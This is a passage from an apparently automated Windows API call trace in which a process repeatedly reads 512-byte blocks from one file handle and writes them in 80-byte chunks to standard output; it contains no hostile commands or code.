(_FileHandle=1) returned 0x4c [0107.516] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] GetFileType (hFile=0x4c) returned 0x1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.517] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.517] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.517] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.517] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] GetFileType (hFile=0x4c) returned 0x1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] GetFileType (hFile=0x4c) returned 0x1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] GetFileType (hFile=0x4c) returned 0x1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] GetFileType (hFile=0x4c) returned 0x1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] GetFileType (hFile=0x4c) returned 0x1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] GetFileType (hFile=0x4c) returned 0x1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] GetFileType (hFile=0x4c) returned 0x1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] GetFileType (hFile=0x4c) returned 0x1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.518] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.518] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.518] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.518] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] GetFileType (hFile=0x4c) returned 0x1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] GetFileType (hFile=0x4c) returned 0x1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] GetFileType (hFile=0x4c) returned 0x1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] GetFileType (hFile=0x4c) returned 0x1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] GetFileType (hFile=0x4c) returned 0x1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] GetFileType (hFile=0x4c) returned 0x1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] GetFileType (hFile=0x4c) returned 0x1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.518] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] GetFileType (hFile=0x4c) returned 0x1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.519] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.519] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.519] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.519] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] GetFileType (hFile=0x4c) returned 0x1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] GetFileType (hFile=0x4c) returned 0x1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] GetFileType (hFile=0x4c) returned 0x1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] GetFileType (hFile=0x4c) returned 0x1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] GetFileType (hFile=0x4c) returned 0x1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] GetFileType (hFile=0x4c) returned 0x1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] GetFileType (hFile=0x4c) returned 0x1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.519] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.519] GetFileType (hFile=0x4c) returned 0x1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.520] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.520] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.520] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.520] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] GetFileType (hFile=0x4c) returned 0x1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] GetFileType (hFile=0x4c) returned 0x1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] GetFileType (hFile=0x4c) returned 0x1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] GetFileType (hFile=0x4c) returned 0x1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] GetFileType (hFile=0x4c) returned 0x1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] GetFileType (hFile=0x4c) returned 0x1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] GetFileType (hFile=0x4c) returned 0x1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.520] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.520] GetFileType (hFile=0x4c) returned 0x1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.521] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.521] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.521] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.521] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] GetFileType (hFile=0x4c) returned 0x1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] GetFileType (hFile=0x4c) returned 0x1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] GetFileType (hFile=0x4c) returned 0x1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] GetFileType (hFile=0x4c) returned 0x1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] GetFileType (hFile=0x4c) returned 0x1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] GetFileType (hFile=0x4c) returned 0x1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] GetFileType (hFile=0x4c) returned 0x1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.521] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.521] GetFileType (hFile=0x4c) returned 0x1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.522] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.522] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.522] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.522] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] GetFileType (hFile=0x4c) returned 0x1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] GetFileType (hFile=0x4c) returned 0x1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] GetFileType (hFile=0x4c) returned 0x1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] GetFileType (hFile=0x4c) returned 0x1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] GetFileType (hFile=0x4c) returned 0x1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] GetFileType (hFile=0x4c) returned 0x1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] GetFileType (hFile=0x4c) returned 0x1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.522] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.522] GetFileType (hFile=0x4c) returned 0x1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.523] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.523] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.523] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.523] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] GetFileType (hFile=0x4c) returned 0x1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] GetFileType (hFile=0x4c) returned 0x1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] GetFileType (hFile=0x4c) returned 0x1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] GetFileType (hFile=0x4c) returned 0x1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] GetFileType (hFile=0x4c) returned 0x1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] GetFileType (hFile=0x4c) returned 0x1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.523] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.523] GetFileType (hFile=0x4c) returned 0x1 [0107.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.524] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.524] GetFileType (hFile=0x4c) returned 0x1 [0107.524] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.524] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.524] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.524] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.524] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.524] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.524] _get_osfhandle 